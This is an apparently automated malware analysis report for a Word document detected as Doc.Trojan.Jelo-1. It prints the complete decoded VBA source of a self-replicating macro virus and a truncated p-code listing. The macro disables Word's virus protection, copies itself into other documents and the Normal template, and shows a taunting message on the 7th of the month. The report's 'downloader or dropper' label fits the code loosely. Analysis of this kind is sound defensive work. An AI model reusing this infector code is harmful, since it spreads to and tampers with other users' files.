Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ed1a581077045dc…

MALICIOUS

Office (OLE)

Size: 29.5 KB
Created: 2001-04-16 08:57:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: f8e71f0296cc32304d067e78e1ddc4b0
SHA-1: 347c371f8078b44f89d613681df498804d36c7fe
SHA-256: 2ed1a581077045dc278710465ca35c98ec1357e40c141eee7b186cdcdc4ca303
Risk score: 280

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that executes code using the Shell() function. This macro attempts to export its code to 'c:\System.drv' and then execute 'notepad.exe' with a hardcoded message, indicating downloader or dropper functionality. The ClamAV detection of 'Doc.Trojan.Jelo-1' further supports its malicious nature.

Heuristics (5)

  • ClamAV: Doc.Trojan.Jelo-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jelo-1
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4900 bytes
SHA-256: 843238e47a9c4802aad5a9fc2508299d9ba78798c7654a5f02accbf49fc7d4e7
Detection
ClamAV: Doc.Trojan.Jelo-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Bentbasha
Private Sub Document_New(): Document_Close: End Sub
Private Sub Document_Open(): Document_Close: End Sub
Private Sub Document_Close(): On Error Resume Next: c = c + 1
Word.Options.VirusProtection = False
Word.Application.EnableCancelKey = wdCancelDisabled
Word.ActiveDocument.ReadOnlyRecommended = False
Word.ShowVisualBasicEditor = False
If Dir("c:\Windows\Acaid32.drv") <> "Acaid32.drv" Then
Set vtijelo = ThisDocument.VBProject.VBComponents(c)
vtijelo.Export ("c:\System.drv")
End If
For t = 1 To Word.Documents.Count
Set f = Word.ActiveWindow.Document.VBProject.VBComponents(t).CodeModule
If f.lines(c, c) <> "'Bentbasha" Then
f.deletelines c, f.countoflines
f.AddFromFile "C:\System.drv"
f.deletelines 1, 4
End If
Next
For g = 1 To Word.Templates.Count
Set n = Templates(1).VBProject.VBComponents(1).CodeModule
If n.lines(1, 1) <> "'Bentbasha" Then
n.AddFromFile "c:\system.drv"
n.deletelines 1, 4
End If
Next
If Day(Now()) = 7 Then
app = Shell(notepad.exe, vbNormalFocus)
SendKeys "Nazalost, Vas kompjuter je inficiran sa W97M.Bentbasha by e[ax] / SpeciesVL!", 0
AppActivate (app)
End If
End Sub
'WM.Bentbasha by e[ax]


' Processing file: /opt/analyzer/scan_staging/fc8ae019179c43cb8cd3127ba33fc7e6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4725 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0009 "Bentbasha"
' Line #1:
' 	FuncDefn (Private Sub Document_New())
' 	BoS 0x0000 
' 	ArgsCall Document_Close 0x0000 
' 	BoS 0x0000 
' 	EndSub 
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	ArgsCall Document_Close 0x0000 
' 	BoS 0x0000 
' 	EndSub 
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' 	BoS 0x0000 
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	Ld c 
' 	LitDI2 0x0001 
' 	Add 
' 	St c 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Word 
' 	MemLd Options 
' 	MemSt VirusProtection 
' Line #5:
' 	Ld wdCancelDisabled 
' 	Ld Word 
' 	MemLd Application 
' 	MemSt EnableCancelKey 
' Line #6:
' 	LitVarSpecial (False)
' 	Ld Word 
' 	MemLd ActiveDocument 
' 	MemSt ReadOnlyRecommended 
' Line #7:
' 	LitVarSpecial (False)
' 	Ld Word 
' 	MemSt ShowVisualBasicEditor 
' Line #8:
' 	LitStr 0x0016 "c:\Windows\Acaid32.drv"
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x000B "Acaid32.drv"
' 	Ne 
' 	IfBlock 
' Line #9:
' 	SetStmt 
' 	Ld c 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set vtijelo 
' Line #10:
' 	LitStr 0x000D "c:\System.drv"
' 	Paren 
' 	Ld vtijelo 
' 	ArgsMemCall Export 0x0001 
' Line #11:
' 	EndIfBlock 
' Line #12:
' 	StartForVariable 
' 	Ld t 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Word 
' 	MemLd Documents 
' 	MemLd Count 
' 	For 
' Line #13:
' 	SetStmt 
' 	Ld t 
' 	Ld Word 
' 	MemLd ActiveWindow 
' 	MemLd Document 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set F 
' Line #14:
' 	Ld c 
' 	Ld c 
' 	Ld F 
' 	ArgsMemLd lines 0x0002 
' 	LitStr 0x000A "'Bentbasha"
' 	Ne 
' 	IfBlock 
' Line #15:
' 	Ld c 
' 	Ld F 
' 	MemLd countoflines 
' 	Ld F 
' 	ArgsMemCall AddFromFile 0x0002 
' Line #16:
' 	LitStr 0x000D "C:\System.drv"
' 	Ld F 
' 	ArgsMemCall norm 0x0001 
' Line #17:
' 	LitDI2 0x0001 
' 	LitDI2 0x0004 
' 	Ld F 
' 	ArgsMemCall AddFromFile 0x0002 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	StartForVariable 
' 	Next 
' Line #20:
' 	StartForVariable 
' 	Ld _B_var_g 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Word 
' 	MemLd n 
' 	MemLd Count 
' 	For 
' Line #21:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd n 0x0001 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set _B_var_n 
' Line #22:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld _B_var_n 
' 	ArgsMemLd lines 0x0002 
' 	LitStr 0x000A "'Bentbasha"
' 	Ne 
' 	IfBlock 
' L
... (truncated)